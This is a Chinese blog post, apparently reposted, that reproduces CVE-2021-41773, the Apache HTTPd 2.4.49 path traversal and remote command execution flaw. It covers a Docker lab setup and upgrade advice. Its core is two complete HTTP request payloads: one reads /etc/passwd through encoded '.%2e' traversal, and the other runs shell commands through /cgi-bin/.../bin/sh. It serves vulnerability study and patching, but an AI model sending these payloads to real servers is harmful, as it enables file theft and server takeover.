zoukankan      html  css  js  c++  java
  • CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越以及RCE漏洞

    CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越以及RCE漏洞

    0x00 简介

    Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。

    0x01 漏洞概述

    2021年10月6日Apache HTTPd官方发布安全更新,披露了CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。在其2.4.49版本中,引入了一个路径穿越漏洞。在路径穿越目录允许被访问的的情况下,例如配置了 <Directory />Require all granted</Directory>,攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。

    0x02 影响版本

    Apache HTTPd 2.4.49版本 且穿越的目录允许被访问。

    0x03 环境搭建

    git clone https://github.com/blasty/CVE-2021-41773

    cd CVE-2021-41773

    docker-compose build && docker-compose up -d

    docker ps 查看镜像所对应端口

     

    访问ip加8080端口出现如下界面即可

     

    0x04 漏洞复现

    任意文件读取:

    访问界面抓包

    直接打payloda即可

    Poc:

    GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

    Host: xxx.xxx.xxx.xxx:8080

    User-Agent: Mozilla/5.0 (X11; FreeBSD i386 6.73; rv:220.59) Gecko/20100101  Chrome/175.28 OPR/220.59;

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

    Accept-Encoding: gzip, deflate

    Connection: close

    Upgrade-Insecure-Requests: 1

    If-Modified-Since: Thu, 14 Oct 2021 06:00:45 GMT

    If-None-Match: "29cd-5ce49cca73d40-gzip"

    Cache-Control: max-age=0

     

    命令执行:

    访问界面抓包

    Poc:

    POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1

    Host: xxx.xxx.xxx.xxx:8080

    User-Agent: Mozilla/5.0 (X11; FreeBSD i386 6.73; rv:220.59) Gecko/20100101  Chrome/175.28 OPR/220.59;

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

    Accept-Encoding: gzip, deflate

    Connection: close

    Upgrade-Insecure-Requests: 1

    If-Modified-Since: Thu, 14 Oct 2021 06:00:45 GMT

    If-None-Match: "29cd-5ce49cca73d40-gzip"

    Cache-Control: max-age=0

    Content-Type: application/x-www-form-urlencoded

    Content-Length: 7

    echo;id

     

    0x05 修复方式

    1、若低于 2.4.49版本,可不升级。

    2、若Apache HTTPd为 2.4.49版本,请尽快升级至最新版本。

    参考链接:

    https://mp.weixin.qq.com/s/-iZcn0M9a1uA64pkVB8Jkw

  • 相关阅读:
    推荐一款稳定快速免费的前端开源项目 CDN 加速服务
    MySQL限时解答
    OneProxy的功能与限制
    MySQL浮点计算存在的问题与解决方案
    DAS、SAN、NAS的区别
    气质
    受制于人
    mysqlbinlog flashback 5.6完全使用手册与原理
    Innodb引擎 compact模式下元组的磁盘存储结构
    数据迁移程序
  • 原文地址:https://www.cnblogs.com/L0ading/p/15406894.html
Copyright © 2011-2022 走看看